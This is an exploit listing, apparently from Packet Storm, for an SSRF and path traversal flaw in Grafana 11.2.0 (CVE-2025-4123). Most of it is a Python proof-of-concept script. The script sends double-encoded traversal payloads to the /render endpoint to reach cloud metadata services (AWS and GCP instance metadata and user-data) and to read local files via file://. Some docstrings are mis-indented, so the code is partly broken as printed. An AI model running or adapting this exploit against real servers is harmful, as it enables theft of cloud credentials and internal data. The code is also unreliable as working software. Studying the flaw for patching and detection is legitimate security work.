Share
## https://sploitus.com/exploit?id=PACKETSTORM:220740
==================================================================================================================================
    | # Title     : Grafana 11.2.0 SSRF Exploit for Internal Resource Access                                                         |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://grafana.com/grafana/download                                                                             |
    ==================================================================================================================================
    
    [+] Summary    : This Python script targets a SSRF vulnerability in a Grafana instance CVE-2025-4123. 
                     It abuses a path traversal flaw in the /render endpoint to make the server send requests to internal or otherwise restricted resources.
    
    [+] POC        :  
    
    import requests
    import re
    
    class GrafanaSSRFExploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.session = requests.Session()
        
        def ssrf_request(self, internal_url):
            """
    Send SSRF request to internal address
            """
            encoded_url = internal_url.replace('/', '%2F').replace(':', '%3A')
            payload = f"/render/public/..%252f%255C{encoded_url}%252f%253F%252f..%252f.."
            
            response = self.session.get(
                f"{self.target}{payload}",
                allow_redirects=False,
                headers={"User-Agent": "Grafana-SSRF-Exploit/1.0"}
            )
            return response
        
        def read_metadata(self):
         "Reading metadata from AWS/GCP (if Grafana is in the cloud)"
            endpoints = [
                "http://169.254.169.254/latest/meta-data/",
                "http://metadata.google.internal/computeMetadata/v1/",
                "http://169.254.169.254/latest/user-data/",
                "http://127.0.0.1:3000/api/health" 
            ]
            
            for endpoint in endpoints:
                print(f"[*] Trying: {endpoint}")
                try:
                    resp = self.ssrf_request(endpoint)
                    if resp.status_code == 200 and len(resp.text) > 0:
                        print(f"[+] Success! Response length: {len(resp.text)}")
                        print(resp.text[:500])
                        return resp.text
                except:
                    pass
            return None
        
        def read_local_file(self, filepath):
         "Attempting to read a local file via file://"
            file_url = f"file://{filepath}"
            try:
                resp = self.ssrf_request(file_url)
                return resp.text if resp.status_code == 200 else None
            except:
                return None
    
    exploit = GrafanaSSRFExploit("http://target-ctf.com:3000")
    
    flag = exploit.read_local_file("/indoushka.txt")
    if flag:
        print(f"[W0WWW] FLAG: {flag}")
    
    
    metadata = exploit.read_metadata()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================